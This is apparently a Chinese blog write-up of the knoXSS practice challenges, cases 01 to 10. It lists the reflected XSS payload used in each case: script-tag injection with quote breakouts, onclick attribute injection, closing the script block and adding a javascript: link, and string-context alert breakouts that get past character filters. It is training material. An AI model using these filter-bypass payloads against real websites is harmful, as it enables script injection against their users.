knoXSS(case01~10)

case 01:

先在每个框里都输入:<script>alert(1)</script>

检查源码

这里第三个和第四个点都被处理过了,所以先考虑第一个和第二个点

这里试了一下,发现GET也能传参,所以构造

成功

case 02:

这里发现变量a和这个似乎有关联,试一下构造:a=<script>alert(1)</script>

成功

case 03:

这两者似乎有关联,尝试构造:b1=<script>alert(1)</script>

然后再构造:b1="><script>alert(1)</script>//

成功

case 04:

与上一题相同的想法,尝试构造:<script>alert(1)</script>

检查源码

构造:'><script>alert(1)</script>//

成功

case 05:

不做赘述了,检查源码

过滤了>

构造:"οnclick=alert(1)//

case06:

 

按照提示,尝试b4

过滤了>,构造:'οnclick=alert(1)//

搞定

case 07:

按照提示

检查源码

构造'alert(1)//

这里单引号被过滤了

尝试实体编码后再URL编码

构造:%26%23x0027%3Balert(1)//

没反应

尝试一种新方法:</script><a href=javascript:alert(1)>1</a>

解释一下:</script>中断script代码块,<a href=javascript:alert(1)>1</a>伪标签

搞↗定↘

case 08:

先观察源代码:

尝试:"<script>alert(1)</script>

发现双引号被过滤了,但是我们发现</script>似乎起作用了,尝试上一关的方法

构造:</script><a href=javascript:alert(1)>a</a>//

过啦!

case 09:

老规矩:'<script>alert(1)</script>//

单引号可以,但是<被过滤了

直接:';alert(1);//

搞定

case 10:

再来:"<script>alert(1)</script>//

双引号没过滤,但过滤了<和上一关一样:";alert(1);//

过了

相关推荐

  1. <span style='color:red;'>0110</span>qt

    0110qt

    2024-06-09 17:02:03      24 阅读
  2. 011axios

    2024-06-09 17:02:03       22 阅读
  3. 010-$nextTick

    2024-06-09 17:02:03       14 阅读
  4. 力扣0110——平衡二叉树

    2024-06-09 17:02:03       41 阅读
  5. 010_redhat安装zookeeper

    2024-06-09 17:02:03       7 阅读
  6. 0101__linux libtool简单使用

    2024-06-09 17:02:03       3 阅读
  7. 010editor 模板位段

    2024-06-09 17:02:03       27 阅读

最近更新

  1. 使用爬虫爬取豆瓣电影Top250(方法二)

    2024-06-09 17:02:03       0 阅读
  2. dos格式文档转unix格式

    2024-06-09 17:02:03       0 阅读
  3. ubuntu版本升级命令记录

    2024-06-09 17:02:03       0 阅读
  4. Android_Android Studio 常用快捷键 for mac

    2024-06-09 17:02:03       0 阅读
  5. PyTorch tutorials:快速学会使用PyTorch

    2024-06-09 17:02:03       0 阅读
  6. Kotlin 数据类(Data Class)

    2024-06-09 17:02:03       0 阅读
  7. 乘积最大3

    2024-06-09 17:02:03       0 阅读
  8. MySQL中的隐式转换(Implicit Conversion)

    2024-06-09 17:02:03       0 阅读

热门阅读

  1. 006 RabbitMQ

    2024-06-09 17:02:03       6 阅读
  2. 记录一次jlink连不上cpu的情况

    2024-06-09 17:02:03       8 阅读
  3. wordpress网站建设详细过程

    2024-06-09 17:02:03       6 阅读
  4. 移动端前端开发遇到过的Andorid和IOS的差异记录

    2024-06-09 17:02:03       5 阅读
  5. Audio音频资源播放

    2024-06-09 17:02:03       5 阅读
  6. springboot + easyRules 搭建规则引擎服务

    2024-06-09 17:02:03       6 阅读
  7. AI学习的基础理论路径

    2024-06-09 17:02:03       4 阅读
  8. es6 proxy的作用和用法

    2024-06-09 17:02:03       5 阅读
  9. 简单记录个python国内镜像源

    2024-06-09 17:02:03       5 阅读